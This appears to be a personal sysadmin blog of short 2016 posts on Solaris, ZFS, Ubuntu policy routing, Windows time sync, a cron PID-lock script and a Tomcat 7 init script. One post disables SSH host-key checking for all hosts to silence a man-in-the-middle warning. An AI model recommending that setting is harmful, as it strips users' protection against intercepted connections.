inet6 fe80::210:e0ff:fe0c:ea9a/10
ether 0:10:e0:c:ea:9a
make it permanent.
root@host:~$ vi /etc/hostname6.igb0
hostname
addif fe80:0000:0000:210:e0ff:fe0c:ea9a/10 up
* note: : is a series of :0000:
oracle, eat a bug. eat a lot.
Thursday, August 18, 2016
let's restart solaris 10 sshd
To check if the service is online or offline:
# svcs -v ssh
online - 12:23:17 115 svc:/network/ssh:default
To stop the service:
#svcadm disable network/ssh
To start the service:
#svcadm enable network/ssh
To restart the service:
# svcadm restart network/ssh
Friday, August 12, 2016
manual jre 8u102 installation on sol10 sparc
gzip -dc jdk-8u102-solaris-sparcv9.tar.gz | tar xf -
mv /opt/jdk1.8.0_102 /usr/jdk/instances/jdk1.8.0
cd /usr/jdk
# ls -la
lrwxrwxrwx 1 root other 7 Jun 8 14:37 j2sdk1.4.2_26 -> ../j2se
lrwxrwxrwx 1 root other 18 Aug 11 11:55 jdk1.5.0_85 -> instances/jdk1.5.0
lrwxrwxrwx 1 root other 18 Aug 11 15:38 jdk1.6.0_121 -> instances/jdk1.6.0
lrwxrwxrwx 1 root other 12 Aug 11 15:38 latest -> jdk1.6.0_121
# ln -s instances/jdk1.8.0 jdk1.8_102
# mv latest latest.orig
# ln -s jdk1.8_102 latest
# cd /usr
# ls -la |grep java
lrwxrwxrwx 1 root other 16 Aug 11 15:38 java -> jdk/jdk1.6.0_121
# mv java java.orig
# ln -s jdk/jdk1.8_102 java
Tuesday, August 9, 2016
ufs to zfs on solaris10
grumble my second drive i've dedicated to solaris zones
has run out of inodes cause it it ufs and not zfs. okay.
# nano -w /etc/vfstab
remove second drive definition; e.g. c2t3C76E3E06C7010BCd0
# umount /zones
# format -e
format
select the second drive. go home.
# zpool list
# zpool create zones c2t3C76E3E06C7010BCd0
# zpool status
# mount |grep zones
# cd /zones
# df -k
zones 1147797504 21 1147797432 1% /zones
that looks like 1T yeah?
# dd if=/dev/zero bs=128k count=40000 of=/zones/bigfile
40000+0 records in
40000+0 records out
# ls -la
total 9250396
drwxr-xr-x 2 root root 3 Aug 8 10:13 .
drwxr-xr-x 25 root root 512 Aug 3 17:08 ..
-rw-r--r-- 1 root root 5242880000 Aug 8 10:13 bigfile
# zpool list
NAME SIZE ALLOC FREE CAP HEALTH ALTROOT
zones 1.09T 4.88G 1.08T 0% ONLINE -
yay.
Monday, August 8, 2016
let's make ssh like telnet
let's make ssh like telnet
me@here:~$ ssh root@there
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
51:e3:4a:61:06:6b:52:04:c1:69:4f:36:47:4e:d6:dc.
Please contact your system administrator.
Add correct host key in known_hosts to get rid of this message.
i am the effing systems administrator. and yeah, i reinstalled the host.
# vi ~/.ssh/config
Host *
StrictHostKeyChecking no
UserKnownHostsFile=/dev/null
and now i'm pretty much flying blind. weeeee
Wednesday, July 13, 2016
Saturday, June 18, 2016
Tuesday, June 14, 2016
remove duplicate crap from bind9 zone files
cat -n db.zone | sort -k 2 | uniq -f 1 | sort -n | cut -f 2- > db.zone.uniq
Monday, June 6, 2016
two interfaces two networks
two interfaces two networks
We will assume that we have two interfaces: eth0 and eth1. The two networks that should be used
are 10.97.136.0/24 and 192.168.5.0/24 .
The first IP address in each respective network is he gateway. Here's how to set thing up in
ubuntu to use two interfaces on two networks:
...
/etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto eth0
iface eth0 inet static
address 10.97.136.83
netmask 255.255.255.0
network 10.97.136.0
broadcast 10.97.136.255
gateway 10.97.136.1
# dns-* options are implemented by the resolvconf package, if installed
dns-nameservers 10.97.136.24 10.97.136.21
dns-search blah.com
auto eth1
iface eth1 inet static
address 192.168.5.55
netmask 255.255.255.0
network 192.168.5.0
...
Add a second kernel routing table
To add a new routing table, edit the file, /etc/iproute2/rt_tables .
The eth1's routing table shall be “rt2” with preference to 1.
...
/etc/iproute2/rt_tables
#
# reserved values
#
255 local
254 main
253 default
0 unspec
#
# local
#
#1 inr.ruhep
1 rt2
...
Configure rt2 routing table
# ip route add 192.168.5.0/24 dev eth1 src 192.168.5.55 table rt2
# ip route add default via 192.168.5.1 dev eth1 table rt2
The first command says that the network, 192.168.5.0/24, can be reached through the eth1 interface.
The second command sets the default gateway (even if there is none).
Configure two rules
# ip rule add from 192.168.5.55/32 table rt2
# ip rule add to 192.168.5.55/32 table rt2
These rules say that both traffic from the IP address, 192.168.5.55, as well as traffic
directed to or through this IP address, should use the rt2 routing table.
Making the Configuration permanent
The ip rule and ip route commands will become invalid after a re-boot, for which reason they should become part of a script
(for example, /etc/rc.local) that will be executed once the network has been started after booting. In ubuntu, these commands
can also be written directly into the /etc/network/interfaces file :
...
auto eth1
iface eth1 inet static
address 192.168.5.55
netmask 255.255.255.0
network 192.168.5.0
post-up ip route add 192.168.5.0/24 dev eth1 src 192.168.5.55 table rt2
post-up ip route add default via 192.168.5.1 dev eth1 table rt2
post-up ip rule add from 192.168.5.55/32 table rt2
post-up ip rule add to 192.168.5.55/32 table rt2
...
If there are more than two networks, a routing table can be created for each additional network analogous to the
above, do a step of one number.
Testing the Configuration
The following commands can be used to ensure that the rules as well as the routing entries are working as expected.
# ip route list table rt2
default via 192.168.5.1 dev eth1
192.168.5.0/24 dev eth1 scope link src 192.168.5.55
# ip rule show
0: from all lookup local
32764: from all to 192.168.5.55 lookup rt2
32765: from 192.168.5.55 lookup rt2
32766: from all lookup main
32767: from all lookup default
pip pip!
time. it is all about time.
w32tm /config /manualpeerlist:"time.server,0x1 time.server2,0x1"
net stop x32time && net start w32time
w32tm /query /status
w32tm /resync /nowait
Wednesday, April 27, 2016
pids and cronjobs and scripts stomping on each other
i am backing up a whole lot of data via a cronjob.
sometimes it takes a really long time. like so long
to bleeds over to the next backup cycle. this will
help me not run stuff in parallel. yuck. processes
stomping all over themselves is no fun.
this script sets the PID (process id) in a standard place.
if the PID is present, the script halts.
if the PID is not there, the script creates the PID file.
and continues along working.
but, if it cannot create, the script dies.
if the PID isn't present, the script creates the PID file.
and continues along working.
but, if it cannot create, the script dies.
PIDFILE=/var/run/script_name.pid
if [ -f $PIDFILE ]
then
PID=$(cat $PIDFILE)
ps -p $PID > /dev/null 2>&1
if [ $? -eq 0 ]
then
echo "process already running"
echo "process already running" | mail -s me@here.org
exit 1
else
echo $$ > $PIDFILE
if [ $? -ne 0 ]
then
echo "could not create PID file"
exit 1
fi
fi
else
echo $$ > $PIDFILE
if [ $? -ne 0 ]
then
echo "could not create PID file"
exit 1
fi
fi
work work work
# remove PID file
rm -f $PIDFILE
Monday, April 11, 2016
solaris 11 studio 12.3 is a pain to install on zones
like for serious.
sol studio needs a cert. 30 days
pkg set-publisher -k /root/certs/pkg.oracle.com.key.pem -c /root/certs/pkg.oracle.com.certificate.pem -G "*" -g https://pkg.oracle.com/solarisstudio/release solarisstudio
well. sharing sunstudio12.3 between the host and paravirtualized system is a no go. awesome.
/etc/zones/zone1.xml has:
filesystem special="/opt/solarisstudio12.3" directory="/opt/solarisstudio12.3" type="lofs"/
let's get rid of it:
# zonecfg -z zone1 remove fs dir=/opt/solarisstudio12.3
Tuesday, February 23, 2016
tomcat7 startup for pwm
/etc/init.d/tomcat7
#!/bin/sh
#
# /etc/init.d/tomcat7 -- startup script for the Tomcat 6 servlet engine
#
# Written by Miquel van Smoorenburg <miquels@cistron.nl>.
# Modified for Debian GNU/Linux by Ian Murdock <imurdock@gnu.ai.mit.edu>.
# Modified for Tomcat by Stefan Gybas <sgybas@debian.org>.
# Modified for Tomcat6 by Thierry Carrez <thierry.carrez@ubuntu.com>.
# Modified for Tomcat7 by Ernesto Hernandez-Novich <emhn@itverx.com.ve>.
# Additional improvements by Jason Brittain <jason.brittain@mulesoft.com>.
#
### BEGIN INIT INFO
# Provides: tomcat7
# Required-Start: $local_fs $remote_fs $network
# Required-Stop: $local_fs $remote_fs $network
# Should-Start: $named
# Should-Stop: $named
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Start Tomcat.
# Description: Start the Tomcat servlet engine.
### END INIT INFO
set -e
PATH=/bin:/usr/bin:/sbin:/usr/sbin
NAME=tomcat7
DESC="Tomcat servlet engine"
DEFAULT=/etc/default/$NAME
JVM_TMP=/tmp/tomcat7-$NAME-tmp
if [ `id -u` -ne 0 ]; then
echo "You need root privileges to run this script"
exit 1
fi
# Make sure tomcat is started with system locale
if [ -r /etc/default/locale ]; then
. /etc/default/locale
export LANG
fi
. /lib/lsb/init-functions
if [ -r /etc/default/rcS ]; then
. /etc/default/rcS
fi
# The following variables can be overwritten in $DEFAULT
# Run Tomcat 7 as this user ID and group ID
TOMCAT7_USER=tomcat7
TOMCAT7_GROUP=tomcat7
# this is a work-around until there is a suitable runtime replacement
# for dpkg-architecture for arch:all packages
# this function sets the variable OPENJDKS
find_openjdks()
{
for jvmdir in /usr/lib/jvm/java-7-openjdk-*
do
if [ -d "${jvmdir}" -a "${jvmdir}" != "/usr/lib/jvm/java-7-openjdk-common" ]
then
OPENJDKS=$jvmdir
fi
done
for jvmdir in /usr/lib/jvm/java-6-openjdk-*
do
if [ -d "${jvmdir}" -a "${jvmdir}" != "/usr/lib/jvm/java-6-openjdk-common" ]
then
OPENJDKS="${OPENJDKS} ${jvmdir}"
fi
done
}
OPENJDKS=""
find_openjdks
# The first existing directory is used for JAVA_HOME (if JAVA_HOME is not
# defined in $DEFAULT)
JDK_DIRS="/usr/lib/jvm/default-java ${OPENJDKS} /usr/lib/jvm/java-6-openjdk /usr/lib/jvm/java-6-sun"
# Look for the right JVM to use
for jdir in $JDK_DIRS; do
if [ -r "$jdir/bin/java" -a -z "${JAVA_HOME}" ]; then
JAVA_HOME="$jdir"
fi
done
export JAVA_HOME
# Directory where the Tomcat 6 binary distribution resides
CATALINA_HOME=/usr/share/$NAME
# Directory for per-instance configuration files and webapps
CATALINA_BASE=/var/lib/$NAME
# Use the Java security manager? (yes/no)
TOMCAT7_SECURITY=no
# Default Java options
# Set java.awt.headless=true if JAVA_OPTS is not set so the
# Xalan XSL transformer can work without X11 display on JDK 1.4+
# It also looks like the default heap size of 64M is not enough for most cases
# so the maximum heap size is set to 128M
if [ -z "$JAVA_OPTS" ]; then
JAVA_OPTS="-Djava.awt.headless=true -Xmx128M"
fi
# End of variables that can be overwritten in $DEFAULT
# overwrite settings from default file
if [ -f "$DEFAULT" ]; then
. "$DEFAULT"
fi
if [ ! -f "$CATALINA_HOME/bin/bootstrap.jar" ]; then
log_failure_msg "$NAME is not installed"
exit 1
fi
POLICY_CACHE="$CATALINA_BASE/work/catalina.policy"
if [ -z "$CATALINA_TMPDIR" ]; then
CATALINA_TMPDIR="$JVM_TMP"
fi
# Set the JSP compiler if set in the tomcat7.default file
if [ -n "$JSP_COMPILER" ]; then
JAVA_OPTS="$JAVA_OPTS -Dbuild.compiler=\"$JSP_COMPILER\""
fi
SECURITY=""
if [ "$TOMCAT7_SECURITY" = "yes" ]; then
SECURITY="-security"
fi
# Define other required variables
CATALINA_PID="/var/run/$NAME.pid"
CATALINA_SH="$CATALINA_HOME/bin/catalina.sh"
# Look for Java Secure Sockets Extension (JSSE) JARs
if [ -z "${JSSE_HOME}" -a -r "${JAVA_HOME}/jre/lib/jsse.jar" ]; then
JSSE_HOME="${JAVA_HOME}/jre/"
fi
catalina_sh() {
# Escape any double quotes in the value of JAVA_OPTS
JAVA_OPTS="$(echo $JAVA_OPTS | sed 's/\"/\\\"/g')"
AUTHBIND_COMMAND=""
if [ "$AUTHBIND" = "yes" -a "$1" = "start" ]; then
JAVA_OPTS="$JAVA_OPTS -Djava.net.preferIPv4Stack=true"
AUTHBIND_COMMAND="/usr/bin/authbind --deep /bin/bash -c "
fi
# Define the command to run Tomcat's catalina.sh as a daemon
# set -a tells sh to export assigned variables to spawned shells.
TOMCAT_SH="set -a; JAVA_HOME=\"$JAVA_HOME\"; source \"$DEFAULT\"; \
CATALINA_HOME=\"$CATALINA_HOME\"; \
CATALINA_BASE=\"$CATALINA_BASE\"; \
JAVA_OPTS=\"$JAVA_OPTS\"; \
CATALINA_PID=\"$CATALINA_PID\"; \
CATALINA_TMPDIR=\"$CATALINA_TMPDIR\"; \
LANG=\"$LANG\"; JSSE_HOME=\"$JSSE_HOME\"; \
cd \"$CATALINA_BASE\"; \
\"$CATALINA_SH\" $@"
if [ "$AUTHBIND" = "yes" -a "$1" = "start" ]; then
TOMCAT_SH="'$TOMCAT_SH'"
fi
# Run the catalina.sh script as a daemon
set +e
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
start-stop-daemon --start -b -u "$TOMCAT7_USER" -g "$TOMCAT7_GROUP" \
-c "$TOMCAT7_USER" -d "$CATALINA_TMPDIR" -p "$CATALINA_PID" \
-x /bin/bash -- -c "$AUTHBIND_COMMAND $TOMCAT_SH"
status="$?"
set +a -e
return $status
}
case "$1" in
start)
if [ -z "$JAVA_HOME" ]; then
log_failure_msg "no JDK found - please set JAVA_HOME"
exit 1
fi
if [ ! -d "$CATALINA_BASE/conf" ]; then
log_failure_msg "invalid CATALINA_BASE: $CATALINA_BASE"
exit 1
fi
log_daemon_msg "Starting $DESC" "$NAME"
if start-stop-daemon --test --start --pidfile "$CATALINA_PID" \
--user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \
>/dev/null; then
# Regenerate POLICY_CACHE file
umask 022
echo "// AUTO-GENERATED FILE from /etc/tomcat7/policy.d/" \
> "$POLICY_CACHE"
echo "" >> "$POLICY_CACHE"
cat $CATALINA_BASE/conf/policy.d/*.policy \
>> "$POLICY_CACHE"
# Remove / recreate JVM_TMP directory
rm -rf "$JVM_TMP"
mkdir -p "$JVM_TMP" || {
log_failure_msg "could not create JVM temporary directory"
exit 1
}
chown $TOMCAT7_USER "$JVM_TMP"
catalina_sh start $SECURITY
sleep 5
if start-stop-daemon --test --start --pidfile "$CATALINA_PID" \
--user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \
>/dev/null; then
if [ -f "$CATALINA_PID" ]; then
rm -f "$CATALINA_PID"
fi
log_end_msg 1
else
log_end_msg 0
fi
else
log_progress_msg "(already running)"
log_end_msg 0
fi
;;
stop)
log_daemon_msg "Stopping $DESC" "$NAME"
set +e
if [ -f "$CATALINA_PID" ]; then
start-stop-daemon --stop --pidfile "$CATALINA_PID" \
--user "$TOMCAT7_USER" \
--retry=TERM/20/KILL/5 >/dev/null
if [ $? -eq 1 ]; then
log_progress_msg "$DESC is not running but pid file exists, cleaning up"
elif [ $? -eq 3 ]; then
PID="`cat $CATALINA_PID`"
log_failure_msg "Failed to stop $NAME (pid $PID)"
exit 1
fi
rm -f "$CATALINA_PID"
rm -rf "$JVM_TMP"
else
log_progress_msg "(not running)"
fi
log_end_msg 0
set -e
;;
status)
set +e
start-stop-daemon --test --start --pidfile "$CATALINA_PID" \
--user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \
>/dev/null 2>&1
if [ "$?" = "0" ]; then
if [ -f "$CATALINA_PID" ]; then
log_success_msg "$DESC is not running, but pid file exists."
exit 1
else
log_success_msg "$DESC is not running."
exit 3
fi
else
log_success_msg "$DESC is running with pid `cat $CATALINA_PID`"
fi
set -e
;;
restart|force-reload)
if [ -f "$CATALINA_PID" ]; then
$0 stop
sleep 1
fi
$0 start
;;
try-restart)
if start-stop-daemon --test --start --pidfile "$CATALINA_PID" \
--user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \
>/dev/null; then
$0 start
fi
;;
*)
log_success_msg "Usage: $0 {start|stop|restart|try-restart|force-reload|status}"
exit 1
;;
esac
exit 0
Subscribe to:
Posts (Atom)